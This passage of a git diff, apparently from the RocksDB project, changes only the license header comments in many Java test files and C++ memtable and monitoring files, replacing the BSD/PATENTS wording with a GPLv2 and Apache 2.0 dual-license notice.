+++ b/java/src/test/java/org/rocksdb/RocksIteratorTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;
 import org.junit.ClassRule;
diff --git a/java/src/test/java/org/rocksdb/RocksMemEnvTest.java b/java/src/test/java/org/rocksdb/RocksMemEnvTest.java
index 141f7f8506b..04fae2e95de 100644
--- a/java/src/test/java/org/rocksdb/RocksMemEnvTest.java
+++ b/java/src/test/java/org/rocksdb/RocksMemEnvTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/SliceTest.java b/java/src/test/java/org/rocksdb/SliceTest.java
index 84894ee3800..7ee656cd280 100644
--- a/java/src/test/java/org/rocksdb/SliceTest.java
+++ b/java/src/test/java/org/rocksdb/SliceTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;
 import org.junit.ClassRule;
diff --git a/java/src/test/java/org/rocksdb/SnapshotTest.java b/java/src/test/java/org/rocksdb/SnapshotTest.java
index 581bae50b97..de48c898bd4 100644
--- a/java/src/test/java/org/rocksdb/SnapshotTest.java
+++ b/java/src/test/java/org/rocksdb/SnapshotTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;
 import org.junit.ClassRule;
diff --git a/java/src/test/java/org/rocksdb/SstFileWriterTest.java b/java/src/test/java/org/rocksdb/SstFileWriterTest.java
index e8be132030f..8c3b0c3d9f5 100644
--- a/java/src/test/java/org/rocksdb/SstFileWriterTest.java
+++ b/java/src/test/java/org/rocksdb/SstFileWriterTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/StatisticsCollectorTest.java b/java/src/test/java/org/rocksdb/StatisticsCollectorTest.java
index 565449d76e0..8dd0cd49308 100644
--- a/java/src/test/java/org/rocksdb/StatisticsCollectorTest.java
+++ b/java/src/test/java/org/rocksdb/StatisticsCollectorTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/StatisticsTest.java b/java/src/test/java/org/rocksdb/StatisticsTest.java
index 6b1d0f16c5d..2103c2fc787 100644
--- a/java/src/test/java/org/rocksdb/StatisticsTest.java
+++ b/java/src/test/java/org/rocksdb/StatisticsTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/StatsCallbackMock.java b/java/src/test/java/org/rocksdb/StatsCallbackMock.java
index 2e28f28efa6..af8db0caabd 100644
--- a/java/src/test/java/org/rocksdb/StatsCallbackMock.java
+++ b/java/src/test/java/org/rocksdb/StatsCallbackMock.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/TtlDBTest.java b/java/src/test/java/org/rocksdb/TtlDBTest.java
index bbf25783f3c..cd72634a237 100644
--- a/java/src/test/java/org/rocksdb/TtlDBTest.java
+++ b/java/src/test/java/org/rocksdb/TtlDBTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/Types.java b/java/src/test/java/org/rocksdb/Types.java
index ca5feb4cb10..c3c1de833a5 100644
--- a/java/src/test/java/org/rocksdb/Types.java
+++ b/java/src/test/java/org/rocksdb/Types.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/WALRecoveryModeTest.java b/java/src/test/java/org/rocksdb/WALRecoveryModeTest.java
index b1a3655c377..2a0133f6b8c 100644
--- a/java/src/test/java/org/rocksdb/WALRecoveryModeTest.java
+++ b/java/src/test/java/org/rocksdb/WALRecoveryModeTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/WriteBatchHandlerTest.java b/java/src/test/java/org/rocksdb/WriteBatchHandlerTest.java
index 953a638f940..646a31ce7c7 100644
--- a/java/src/test/java/org/rocksdb/WriteBatchHandlerTest.java
+++ b/java/src/test/java/org/rocksdb/WriteBatchHandlerTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/WriteBatchTest.java b/java/src/test/java/org/rocksdb/WriteBatchTest.java
index 1e289d532b5..83f90c8eb45 100644
--- a/java/src/test/java/org/rocksdb/WriteBatchTest.java
+++ b/java/src/test/java/org/rocksdb/WriteBatchTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/java/src/test/java/org/rocksdb/WriteBatchThreadedTest.java b/java/src/test/java/org/rocksdb/WriteBatchThreadedTest.java
index 7dbe99f4fc1..c5090dbceba 100644
--- a/java/src/test/java/org/rocksdb/WriteBatchThreadedTest.java
+++ b/java/src/test/java/org/rocksdb/WriteBatchThreadedTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;
 import org.junit.After;
diff --git a/java/src/test/java/org/rocksdb/WriteBatchWithIndexTest.java b/java/src/test/java/org/rocksdb/WriteBatchWithIndexTest.java
index 61e7176aeaa..1c5e34234e8 100644
--- a/java/src/test/java/org/rocksdb/WriteBatchWithIndexTest.java
+++ b/java/src/test/java/org/rocksdb/WriteBatchWithIndexTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/java/src/test/java/org/rocksdb/WriteOptionsTest.java b/java/src/test/java/org/rocksdb/WriteOptionsTest.java
index 733f24b8a75..72a06878664 100644
--- a/java/src/test/java/org/rocksdb/WriteOptionsTest.java
+++ b/java/src/test/java/org/rocksdb/WriteOptionsTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/test/RocksJunitRunner.java b/java/src/test/java/org/rocksdb/test/RocksJunitRunner.java
index 68f100274ab..02ad0380ee9 100644
--- a/java/src/test/java/org/rocksdb/test/RocksJunitRunner.java
+++ b/java/src/test/java/org/rocksdb/test/RocksJunitRunner.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb.test;
 import org.junit.internal.JUnitSystem;
diff --git a/java/src/test/java/org/rocksdb/util/BytewiseComparatorTest.java b/java/src/test/java/org/rocksdb/util/BytewiseComparatorTest.java
index 01ea52c49c2..42508bc118e 100644
--- a/java/src/test/java/org/rocksdb/util/BytewiseComparatorTest.java
+++ b/java/src/test/java/org/rocksdb/util/BytewiseComparatorTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb.util;

diff --git a/java/src/test/java/org/rocksdb/util/EnvironmentTest.java b/java/src/test/java/org/rocksdb/util/EnvironmentTest.java
index 85e0c632c44..28ee04768e9 100644
--- a/java/src/test/java/org/rocksdb/util/EnvironmentTest.java
+++ b/java/src/test/java/org/rocksdb/util/EnvironmentTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2014, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb.util;
 import org.junit.AfterClass;
diff --git a/java/src/test/java/org/rocksdb/util/SizeUnitTest.java b/java/src/test/java/org/rocksdb/util/SizeUnitTest.java
index e74c0410303..990aa5f47a4 100644
--- a/java/src/test/java/org/rocksdb/util/SizeUnitTest.java
+++ b/java/src/test/java/org/rocksdb/util/SizeUnitTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb.util;
 import org.junit.Test;
diff --git a/memtable/alloc_tracker.cc b/memtable/alloc_tracker.cc
index fa3072c607a..9889cc4230c 100644
--- a/memtable/alloc_tracker.cc
+++ b/memtable/alloc_tracker.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/memtable/hash_cuckoo_rep.cc b/memtable/hash_cuckoo_rep.cc
index bbcd2dab453..034bf5858b6 100644
--- a/memtable/hash_cuckoo_rep.cc
+++ b/memtable/hash_cuckoo_rep.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //

 #ifndef ROCKSDB_LITE
diff --git a/memtable/hash_cuckoo_rep.h b/memtable/hash_cuckoo_rep.h
index b4418f84f80..800696e931a 100644
--- a/memtable/hash_cuckoo_rep.h
+++ b/memtable/hash_cuckoo_rep.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
diff --git a/memtable/hash_linklist_rep.cc b/memtable/hash_linklist_rep.cc
index f0e9b869107..932b62a3460 100644
--- a/memtable/hash_linklist_rep.cc
+++ b/memtable/hash_linklist_rep.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //

 #ifndef ROCKSDB_LITE
diff --git a/memtable/hash_linklist_rep.h b/memtable/hash_linklist_rep.h
index bb7863e5019..a6da3eedd51 100644
--- a/memtable/hash_linklist_rep.h
+++ b/memtable/hash_linklist_rep.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
diff --git a/memtable/hash_skiplist_rep.cc b/memtable/hash_skiplist_rep.cc
index 360f48f8986..e34743eb2c7 100644
--- a/memtable/hash_skiplist_rep.cc
+++ b/memtable/hash_skiplist_rep.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //

 #ifndef ROCKSDB_LITE
diff --git a/memtable/hash_skiplist_rep.h b/memtable/hash_skiplist_rep.h
index bf04f5641c4..5d1e04f34df 100644
--- a/memtable/hash_skiplist_rep.h
+++ b/memtable/hash_skiplist_rep.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
diff --git a/memtable/inlineskiplist.h b/memtable/inlineskiplist.h
index 43bb09ac81e..5cf6c57d573 100644
--- a/memtable/inlineskiplist.h
+++ b/memtable/inlineskiplist.h
@@ -1,8 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional
-// grant of patent rights can be found in the PATENTS file in the same
-// directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved. Use of
 // this source code is governed by a BSD-style license that can be found
diff --git a/memtable/inlineskiplist_test.cc b/memtable/inlineskiplist_test.cc
index 097bd4e563f..46d6c0fa988 100644
--- a/memtable/inlineskiplist_test.cc
+++ b/memtable/inlineskiplist_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/memtable/memtablerep_bench.cc b/memtable/memtablerep_bench.cc
index d91efc00e5a..63a0201ce82 100644
--- a/memtable/memtablerep_bench.cc
+++ b/memtable/memtablerep_bench.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/memtable/skiplist.h b/memtable/skiplist.h
index f835747c045..0162dccb78a 100644
--- a/memtable/skiplist.h
+++ b/memtable/skiplist.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/memtable/skiplist_test.cc b/memtable/skiplist_test.cc
index fb56d775455..2f4af17885e 100644
--- a/memtable/skiplist_test.cc
+++ b/memtable/skiplist_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/memtable/skiplistrep.cc b/memtable/skiplistrep.cc
index 15ce89a6c0e..f56be5dcb62 100644
--- a/memtable/skiplistrep.cc
+++ b/memtable/skiplistrep.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #include "memtable/inlineskiplist.h"
 #include "db/memtable.h"
diff --git a/memtable/stl_wrappers.h b/memtable/stl_wrappers.h
index 5dc3d8f6b73..19fa1514881 100644
--- a/memtable/stl_wrappers.h
+++ b/memtable/stl_wrappers.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #pragma once
 #include
diff --git a/memtable/vectorrep.cc b/memtable/vectorrep.cc
index dcba842fd43..e54025c2d3d 100644
--- a/memtable/vectorrep.cc
+++ b/memtable/vectorrep.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
 #include "rocksdb/memtablerep.h"
diff --git a/memtable/write_buffer_manager.cc b/memtable/write_buffer_manager.cc
index c00d842abb3..bac0fdd8fbd 100644
--- a/memtable/write_buffer_manager.cc
+++ b/memtable/write_buffer_manager.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/memtable/write_buffer_manager_test.cc b/memtable/write_buffer_manager_test.cc
index e0cdff2dd04..0fc9fd06c7c 100644
--- a/memtable/write_buffer_manager_test.cc
+++ b/memtable/write_buffer_manager_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/monitoring/file_read_sample.h b/monitoring/file_read_sample.h
index 2cefe552268..9ad7d2f56ea 100644
--- a/monitoring/file_read_sample.h
+++ b/monitoring/file_read_sample.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
 #include "db/version_edit.h"
diff --git a/monitoring/histogram.cc b/monitoring/histogram.cc
index 16091be3333..835ffc88a70 100644
--- a/monitoring/histogram.cc
+++ b/monitoring/histogram.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/monitoring/histogram.h b/monitoring/histogram.h
index 30dc9b1fe79..6a1ebbf0489 100644
--- a/monitoring/histogram.h
+++ b/monitoring/histogram.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/monitoring/histogram_test.cc b/monitoring/histogram_test.cc
index f534013c548..70147af7267 100644
--- a/monitoring/histogram_test.cc
+++ b/monitoring/histogram_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //

 #include
diff --git a/monitoring/histogram_windowing.cc b/monitoring/histogram_windowing.cc
index 3130dd466e8..20ee983f145 100644
--- a/monitoring/histogram_windowing.cc
+++ b/monitoring/histogram_windowing.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
